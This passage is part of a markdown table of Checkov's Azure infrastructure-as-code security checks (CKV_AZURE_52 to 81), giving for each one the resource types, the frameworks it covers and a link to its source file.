Installed | Terraform | [AzureInstanceExtensions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureInstanceExtensions.py) | +| 1729 | CKV_AZURE_52 | resource | Microsoft.Sql/servers | Ensure MSSQL is using the latest version of TLS encryption | arm | [MSSQLServerMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MSSQLServerMinTLSVersion.py) | +| 1730 | CKV_AZURE_52 | resource | Microsoft.Sql/servers | Ensure MSSQL is using the latest version of TLS encryption | Bicep | [MSSQLServerMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MSSQLServerMinTLSVersion.py) | +| 1731 | CKV_AZURE_52 | resource | azurerm_mssql_server | 
Ensure MSSQL is using the latest version of TLS encryption | Terraform | [MSSQLServerMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MSSQLServerMinTLSVersion.py) | +| 1732 | CKV_AZURE_53 | resource | Microsoft.DBforMySQL/servers | Ensure 'public network access enabled' is set to 'False' for mySQL servers | arm | [MySQLPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLPublicAccessDisabled.py) | +| 1733 | CKV_AZURE_53 | resource | Microsoft.DBforMySQL/servers | Ensure 'public network access enabled' is set to 'False' for mySQL servers | Bicep | [MySQLPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLPublicAccessDisabled.py) | +| 1734 | CKV_AZURE_53 | resource | azurerm_mysql_server | Ensure 'public network access enabled' is set to 'False' for mySQL servers | Terraform | [MySQLPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLPublicAccessDisabled.py) | +| 1735 | CKV_AZURE_54 | resource | Microsoft.DBforMySQL/servers | Ensure MySQL is using the latest version of TLS encryption | arm | [MySQLServerMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLServerMinTLSVersion.py) | +| 1736 | CKV_AZURE_54 | resource | Microsoft.DBforMySQL/servers | Ensure MySQL is using the latest version of TLS encryption | Bicep | [MySQLServerMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLServerMinTLSVersion.py) | +| 1737 | CKV_AZURE_54 | resource | azurerm_mysql_server | Ensure MySQL is using the latest version of TLS encryption | Terraform | [MySQLServerMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLServerMinTLSVersion.py) | +| 1738 | CKV_AZURE_55 | resource | 
azurerm_security_center_subscription_pricing | Ensure that Azure Defender is set to On for Servers | Terraform | [AzureDefenderOnServers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnServers.py) | +| 1739 | CKV_AZURE_56 | resource | Microsoft.Web/sites/config | Ensure that function apps enables Authentication | arm | [FunctionAppsEnableAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppsEnableAuthentication.py) | +| 1740 | CKV_AZURE_56 | resource | Microsoft.Web/sites/config | Ensure that function apps enables Authentication | Bicep | [FunctionAppsEnableAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppsEnableAuthentication.py) | +| 1741 | CKV_AZURE_56 | resource | azurerm_function_app | Ensure that function apps enables Authentication | Terraform | [FunctionAppsEnableAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsEnableAuthentication.py) | +| 1742 | CKV_AZURE_57 | resource | Microsoft.Web/sites | Ensure that CORS disallows every resource to access app services | arm | [AppServiceDisallowCORS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceDisallowCORS.py) | +| 1743 | CKV_AZURE_57 | resource | Microsoft.Web/sites | Ensure that CORS disallows every resource to access app services | Bicep | [AppServiceDisallowCORS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceDisallowCORS.py) | +| 1744 | CKV_AZURE_57 | resource | azurerm_app_service | Ensure that CORS disallows every resource to access app services | Terraform | [AppServiceDisallowCORS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDisallowCORS.py) | +| 1745 | CKV_AZURE_57 | resource | azurerm_linux_web_app | Ensure that CORS 
disallows every resource to access app services | Terraform | [AppServiceDisallowCORS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDisallowCORS.py) | +| 1746 | CKV_AZURE_57 | resource | azurerm_windows_web_app | Ensure that CORS disallows every resource to access app services | Terraform | [AppServiceDisallowCORS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDisallowCORS.py) | +| 1747 | CKV_AZURE_58 | resource | Microsoft.Synapse/workspaces | Ensure that Azure Synapse workspaces enables managed virtual networks | arm | [SynapseWorkspaceEnablesManagedVirtualNetworks.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SynapseWorkspaceEnablesManagedVirtualNetworks.py) | +| 1748 | CKV_AZURE_58 | resource | Microsoft.Synapse/workspaces | Ensure that Azure Synapse workspaces enables managed virtual networks | Bicep | [SynapseWorkspaceEnablesManagedVirtualNetworks.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SynapseWorkspaceEnablesManagedVirtualNetworks.py) | +| 1749 | CKV_AZURE_58 | resource | azurerm_synapse_workspace | Ensure that Azure Synapse workspaces enables managed virtual networks | Terraform | [SynapseWorkspaceEnablesManagedVirtualNetworks.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SynapseWorkspaceEnablesManagedVirtualNetworks.py) | +| 1750 | CKV_AZURE_59 | resource | Microsoft.Storage/storageAccounts | Ensure that Storage accounts disallow public access | arm | [StorageAccountDisablePublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountDisablePublicAccess.py) | +| 1751 | CKV_AZURE_59 | resource | Microsoft.Storage/storageAccounts | Ensure that Storage accounts disallow public access | Bicep | 
[StorageAccountDisablePublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountDisablePublicAccess.py) | +| 1752 | CKV_AZURE_59 | resource | azurerm_storage_account | Ensure that Storage accounts disallow public access | Terraform | [StorageAccountDisablePublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountDisablePublicAccess.py) | +| 1753 | CKV_AZURE_61 | resource | azurerm_security_center_subscription_pricing | Ensure that Azure Defender is set to On for App Service | Terraform | [AzureDefenderOnAppServices.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnAppServices.py) | +| 1754 | CKV_AZURE_62 | resource | Microsoft.Web/sites | Ensure function apps are not accessible from all regions | arm | [FunctionAppDisallowCORS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppDisallowCORS.py) | +| 1755 | CKV_AZURE_62 | resource | Microsoft.Web/sites | Ensure function apps are not accessible from all regions | Bicep | [FunctionAppDisallowCORS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppDisallowCORS.py) | +| 1756 | CKV_AZURE_62 | resource | azurerm_function_app | Ensure function apps are not accessible from all regions | Terraform | [FunctionAppDisallowCORS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppDisallowCORS.py) | +| 1757 | CKV_AZURE_63 | resource | Microsoft.Web/sites/config | Ensure that App service enables HTTP logging | arm | [AppServiceHttpLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceHttpLoggingEnabled.py) | +| 1758 | CKV_AZURE_63 | resource | Microsoft.Web/sites/config | Ensure that App service enables HTTP logging | Bicep | 
[AppServiceHttpLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceHttpLoggingEnabled.py) | +| 1759 | CKV_AZURE_63 | resource | azurerm_app_service | Ensure that App service enables HTTP logging | Terraform | [AppServiceHttpLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHttpLoggingEnabled.py) | +| 1760 | CKV_AZURE_63 | resource | azurerm_linux_web_app | Ensure that App service enables HTTP logging | Terraform | [AppServiceHttpLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHttpLoggingEnabled.py) | +| 1761 | CKV_AZURE_63 | resource | azurerm_windows_web_app | Ensure that App service enables HTTP logging | Terraform | [AppServiceHttpLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHttpLoggingEnabled.py) | +| 1762 | CKV_AZURE_64 | resource | Microsoft.StorageSync/storageSyncServices | Ensure that Azure File Sync disables public network access | arm | [StorageSyncPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageSyncPublicAccessDisabled.py) | +| 1763 | CKV_AZURE_64 | resource | Microsoft.StorageSync/storageSyncServices | Ensure that Azure File Sync disables public network access | Bicep | [StorageSyncPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageSyncPublicAccessDisabled.py) | +| 1764 | CKV_AZURE_64 | resource | azurerm_storage_sync | Ensure that Azure File Sync disables public network access | Terraform | [StorageSyncPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageSyncPublicAccessDisabled.py) | +| 1765 | CKV_AZURE_65 | resource | Microsoft.Web/sites/config | Ensure that App service enables detailed error 
messages | arm | [AppServiceDetailedErrorMessagesEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceDetailedErrorMessagesEnabled.py) | +| 1766 | CKV_AZURE_65 | resource | Microsoft.Web/sites/config | Ensure that App service enables detailed error messages | Bicep | [AppServiceDetailedErrorMessagesEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceDetailedErrorMessagesEnabled.py) | +| 1767 | CKV_AZURE_65 | resource | azurerm_app_service | Ensure that App service enables detailed error messages | Terraform | [AppServiceDetailedErrorMessagesEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDetailedErrorMessagesEnabled.py) | +| 1768 | CKV_AZURE_65 | resource | azurerm_linux_web_app | Ensure that App service enables detailed error messages | Terraform | [AppServiceDetailedErrorMessagesEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDetailedErrorMessagesEnabled.py) | +| 1769 | CKV_AZURE_65 | resource | azurerm_windows_web_app | Ensure that App service enables detailed error messages | Terraform | [AppServiceDetailedErrorMessagesEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDetailedErrorMessagesEnabled.py) | +| 1770 | CKV_AZURE_66 | resource | Microsoft.Web/sites/config | Ensure that App service enables failed request tracing | arm | [AppServiceEnableFailedRequest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceEnableFailedRequest.py) | +| 1771 | CKV_AZURE_66 | resource | Microsoft.Web/sites/config | Ensure that App service enables failed request tracing | Bicep | [AppServiceEnableFailedRequest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceEnableFailedRequest.py) | +| 1772 | CKV_AZURE_66 | resource 
| azurerm_app_service | Ensure that App service enables failed request tracing | Terraform | [AppServiceEnableFailedRequest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceEnableFailedRequest.py) | +| 1773 | CKV_AZURE_66 | resource | azurerm_linux_web_app | Ensure that App service enables failed request tracing | Terraform | [AppServiceEnableFailedRequest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceEnableFailedRequest.py) | +| 1774 | CKV_AZURE_66 | resource | azurerm_windows_web_app | Ensure that App service enables failed request tracing | Terraform | [AppServiceEnableFailedRequest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceEnableFailedRequest.py) | +| 1775 | CKV_AZURE_67 | resource | Microsoft.Web/sites | Ensure that 'HTTP Version' is the latest, if used to run the Function app | arm | [FunctionAppHttpVersionLatest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppHttpVersionLatest.py) | +| 1776 | CKV_AZURE_67 | resource | Microsoft.Web/sites | Ensure that 'HTTP Version' is the latest, if used to run the Function app | Bicep | [FunctionAppHttpVersionLatest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppHttpVersionLatest.py) | +| 1777 | CKV_AZURE_67 | resource | Microsoft.Web/sites/slots | Ensure that 'HTTP Version' is the latest, if used to run the Function app | arm | [FunctionAppHttpVersionLatest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppHttpVersionLatest.py) | +| 1778 | CKV_AZURE_67 | resource | Microsoft.Web/sites/slots | Ensure that 'HTTP Version' is the latest, if used to run the Function app | Bicep | [FunctionAppHttpVersionLatest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppHttpVersionLatest.py) | 
+| 1779 | CKV_AZURE_67 | resource | azurerm_function_app | Ensure that 'HTTP Version' is the latest, if used to run the Function app | Terraform | [FunctionAppHttpVersionLatest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppHttpVersionLatest.py) | +| 1780 | CKV_AZURE_67 | resource | azurerm_function_app_slot | Ensure that 'HTTP Version' is the latest, if used to run the Function app | Terraform | [FunctionAppHttpVersionLatest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppHttpVersionLatest.py) | +| 1781 | CKV_AZURE_68 | resource | Microsoft.DBforPostgreSQL/servers | Ensure that PostgreSQL server disables public network access | arm | [PostgreSQLServerPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerPublicAccessDisabled.py) | +| 1782 | CKV_AZURE_68 | resource | Microsoft.DBforPostgreSQL/servers | Ensure that PostgreSQL server disables public network access | Bicep | [PostgreSQLServerPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerPublicAccessDisabled.py) | +| 1783 | CKV_AZURE_68 | resource | azurerm_postgresql_server | Ensure that PostgreSQL server disables public network access | Terraform | [PostgreSQLServerPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLServerPublicAccessDisabled.py) | +| 1784 | CKV_AZURE_69 | resource | azurerm_security_center_subscription_pricing | Ensure that Azure Defender is set to On for Azure SQL database servers | Terraform | [AzureDefenderOnSqlServers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnSqlServers.py) | +| 1785 | CKV_AZURE_70 | resource | Microsoft.Web/sites | Ensure that Function apps is only accessible over HTTPS | arm | 
[FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppsAccessibleOverHttps.py) | +| 1786 | CKV_AZURE_70 | resource | Microsoft.Web/sites | Ensure that Function apps is only accessible over HTTPS | Bicep | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppsAccessibleOverHttps.py) | +| 1787 | CKV_AZURE_70 | resource | Microsoft.Web/sites/config | Ensure that Function apps is only accessible over HTTPS | arm | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppsAccessibleOverHttps.py) | +| 1788 | CKV_AZURE_70 | resource | Microsoft.Web/sites/config | Ensure that Function apps is only accessible over HTTPS | Bicep | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppsAccessibleOverHttps.py) | +| 1789 | CKV_AZURE_70 | resource | Microsoft.Web/sites/slots | Ensure that Function apps is only accessible over HTTPS | arm | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppsAccessibleOverHttps.py) | +| 1790 | CKV_AZURE_70 | resource | Microsoft.Web/sites/slots | Ensure that Function apps is only accessible over HTTPS | Bicep | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppsAccessibleOverHttps.py) | +| 1791 | CKV_AZURE_70 | resource | azurerm_function_app | Ensure that Function apps is only accessible over HTTPS | Terraform | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsAccessibleOverHttps.py) | +| 1792 | CKV_AZURE_70 | resource | azurerm_function_app_slot | Ensure that Function apps is only accessible over HTTPS | Terraform | 
[FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsAccessibleOverHttps.py) | +| 1793 | CKV_AZURE_70 | resource | azurerm_linux_function_app | Ensure that Function apps is only accessible over HTTPS | Terraform | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsAccessibleOverHttps.py) | +| 1794 | CKV_AZURE_70 | resource | azurerm_linux_function_app_slot | Ensure that Function apps is only accessible over HTTPS | Terraform | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsAccessibleOverHttps.py) | +| 1795 | CKV_AZURE_70 | resource | azurerm_windows_function_app | Ensure that Function apps is only accessible over HTTPS | Terraform | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsAccessibleOverHttps.py) | +| 1796 | CKV_AZURE_70 | resource | azurerm_windows_function_app_slot | Ensure that Function apps is only accessible over HTTPS | Terraform | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsAccessibleOverHttps.py) | +| 1797 | CKV_AZURE_71 | resource | Microsoft.Web/sites | Ensure that Managed identity provider is enabled for web apps | arm | [AppServiceIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceIdentityProviderEnabled.py) | +| 1798 | CKV_AZURE_71 | resource | Microsoft.Web/sites | Ensure that Managed identity provider is enabled for web apps | Bicep | [AppServiceIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceIdentityProviderEnabled.py) | +| 1799 | CKV_AZURE_71 | resource | 
azurerm_app_service | Ensure that Managed identity provider is enabled for app services | Terraform | [AppServiceIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceIdentityProviderEnabled.py) | +| 1800 | CKV_AZURE_71 | resource | azurerm_linux_web_app | Ensure that Managed identity provider is enabled for app services | Terraform | [AppServiceIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceIdentityProviderEnabled.py) | +| 1801 | CKV_AZURE_71 | resource | azurerm_windows_web_app | Ensure that Managed identity provider is enabled for app services | Terraform | [AppServiceIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceIdentityProviderEnabled.py) | +| 1802 | CKV_AZURE_72 | resource | Microsoft.Web/sites | Ensure that remote debugging is not enabled for app services | arm | [AppServiceRemoteDebuggingNotEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceRemoteDebuggingNotEnabled.py) | +| 1803 | CKV_AZURE_72 | resource | Microsoft.Web/sites | Ensure that remote debugging is not enabled for app services | Bicep | [AppServiceRemoteDebuggingNotEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceRemoteDebuggingNotEnabled.py) | +| 1804 | CKV_AZURE_72 | resource | azurerm_app_service | Ensure that remote debugging is not enabled for app services | Terraform | [AppServiceRemoteDebuggingNotEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceRemoteDebuggingNotEnabled.py) | +| 1805 | CKV_AZURE_72 | resource | azurerm_linux_web_app | Ensure that remote debugging is not enabled for app services | Terraform | 
[AppServiceRemoteDebuggingNotEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceRemoteDebuggingNotEnabled.py) | +| 1806 | CKV_AZURE_72 | resource | azurerm_windows_web_app | Ensure that remote debugging is not enabled for app services | Terraform | [AppServiceRemoteDebuggingNotEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceRemoteDebuggingNotEnabled.py) | +| 1807 | CKV_AZURE_73 | resource | Microsoft.Automation/automationAccounts/variables | Ensure that Automation account variables are encrypted | arm | [AutomationEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AutomationEncrypted.py) | +| 1808 | CKV_AZURE_73 | resource | Microsoft.Automation/automationAccounts/variables | Ensure that Automation account variables are encrypted | Bicep | [AutomationEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AutomationEncrypted.py) | +| 1809 | CKV_AZURE_73 | resource | azurerm_automation_variable_bool | Ensure that Automation account variables are encrypted | Terraform | [AutomationEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AutomationEncrypted.py) | +| 1810 | CKV_AZURE_73 | resource | azurerm_automation_variable_datetime | Ensure that Automation account variables are encrypted | Terraform | [AutomationEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AutomationEncrypted.py) | +| 1811 | CKV_AZURE_73 | resource | azurerm_automation_variable_int | Ensure that Automation account variables are encrypted | Terraform | [AutomationEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AutomationEncrypted.py) | +| 1812 | CKV_AZURE_73 | resource | azurerm_automation_variable_string | Ensure that Automation account 
variables are encrypted | Terraform | [AutomationEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AutomationEncrypted.py) | +| 1813 | CKV_AZURE_74 | resource | Microsoft.Kusto/clusters | Ensure that Azure Data Explorer (Kusto) uses disk encryption | arm | [DataExplorerUsesDiskEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/DataExplorerUsesDiskEncryption.py) | +| 1814 | CKV_AZURE_74 | resource | Microsoft.Kusto/clusters | Ensure that Azure Data Explorer (Kusto) uses disk encryption | Bicep | [DataExplorerUsesDiskEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/DataExplorerUsesDiskEncryption.py) | +| 1815 | CKV_AZURE_74 | resource | azurerm_kusto_cluster | Ensure that Azure Data Explorer (Kusto) uses disk encryption | Terraform | [DataExplorerUsesDiskEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DataExplorerUsesDiskEncryption.py) | +| 1816 | CKV_AZURE_75 | resource | Microsoft.Kusto/clusters | Ensure that Azure Data Explorer uses double encryption | arm | [AzureDataExplorerDoubleEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureDataExplorerDoubleEncryptionEnabled.py) | +| 1817 | CKV_AZURE_75 | resource | Microsoft.Kusto/clusters | Ensure that Azure Data Explorer uses double encryption | Bicep | [AzureDataExplorerDoubleEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureDataExplorerDoubleEncryptionEnabled.py) | +| 1818 | CKV_AZURE_75 | resource | azurerm_kusto_cluster | Ensure that Azure Data Explorer uses double encryption | Terraform | [AzureDataExplorerDoubleEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDataExplorerDoubleEncryptionEnabled.py) | +| 1819 | CKV_AZURE_76 | resource | 
Microsoft.Batch/batchAccounts | Ensure that Azure Batch account uses key vault to encrypt data | arm | [AzureBatchAccountUsesKeyVaultEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureBatchAccountUsesKeyVaultEncryption.py) | +| 1820 | CKV_AZURE_76 | resource | Microsoft.Batch/batchAccounts | Ensure that Azure Batch account uses key vault to encrypt data | Bicep | [AzureBatchAccountUsesKeyVaultEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureBatchAccountUsesKeyVaultEncryption.py) | +| 1821 | CKV_AZURE_76 | resource | azurerm_batch_account | Ensure that Azure Batch account uses key vault to encrypt data | Terraform | [AzureBatchAccountUsesKeyVaultEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureBatchAccountUsesKeyVaultEncryption.py) | +| 1822 | CKV_AZURE_77 | resource | azurerm_network_security_group | Ensure that UDP Services are restricted from the Internet | Terraform | [NSGRuleUDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleUDPAccessRestricted.py) | +| 1823 | CKV_AZURE_77 | resource | azurerm_network_security_rule | Ensure that UDP Services are restricted from the Internet | Terraform | [NSGRuleUDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleUDPAccessRestricted.py) | +| 1824 | CKV_AZURE_78 | resource | Microsoft.Web/sites | Ensure FTP deployments are disabled | arm | [AppServiceFTPSState.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceFTPSState.py) | +| 1825 | CKV_AZURE_78 | resource | Microsoft.Web/sites | Ensure FTP deployments are disabled | Bicep | [AppServiceFTPSState.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceFTPSState.py) | +| 1826 | CKV_AZURE_78 | resource | 
azurerm_app_service | Ensure FTP deployments are disabled | Terraform | [AppServiceFTPSState.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceFTPSState.py) | +| 1827 | CKV_AZURE_78 | resource | azurerm_linux_web_app | Ensure FTP deployments are disabled | Terraform | [AppServiceFTPSState.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceFTPSState.py) | +| 1828 | CKV_AZURE_78 | resource | azurerm_windows_web_app | Ensure FTP deployments are disabled | Terraform | [AppServiceFTPSState.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceFTPSState.py) | +| 1829 | CKV_AZURE_79 | resource | Microsoft.Security/pricings | Ensure that Azure Defender is set to On for SQL servers on machines | arm | [AzureDefenderOnSqlServersVMS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureDefenderOnSqlServersVMS.py) | +| 1830 | CKV_AZURE_79 | resource | Microsoft.Security/pricings | Ensure that Azure Defender is set to On for SQL servers on machines | Bicep | [AzureDefenderOnSqlServersVMS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureDefenderOnSqlServersVMS.py) | +| 1831 | CKV_AZURE_79 | resource | azurerm_security_center_subscription_pricing | Ensure that Azure Defender is set to On for SQL servers on machines | Terraform | [AzureDefenderOnSqlServerVMS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnSqlServerVMS.py) | +| 1832 | CKV_AZURE_80 | resource | Microsoft.Web/sites/config | Ensure that 'Net Framework' version is the latest, if used as a part of the web app | arm | [AppServiceDotnetFrameworkVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceDotnetFrameworkVersion.py) | +| 1833 | CKV_AZURE_80 | resource | Microsoft.Web/sites/config | 
Ensure that 'Net Framework' version is the latest, if used as a part of the web app | Bicep | [AppServiceDotnetFrameworkVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceDotnetFrameworkVersion.py) | +| 1834 | CKV_AZURE_80 | resource | azurerm_app_service | Ensure that 'Net Framework' version is the latest, if used as a part of the web app | Terraform | [AppServiceDotnetFrameworkVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDotnetFrameworkVersion.py) | +| 1835 | CKV_AZURE_80 | resource | azurerm_windows_web_app | Ensure that 'Net Framework' version is the latest, if used as a part of the web app | Terraform | [AppServiceDotnetFrameworkVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDotnetFrameworkVersion.py) | +| 1836 | CKV_AZURE_81 | resource | Microsoft.Web/sites | Ensure that 'PHP version' is the latest, if used to run the web app | arm | 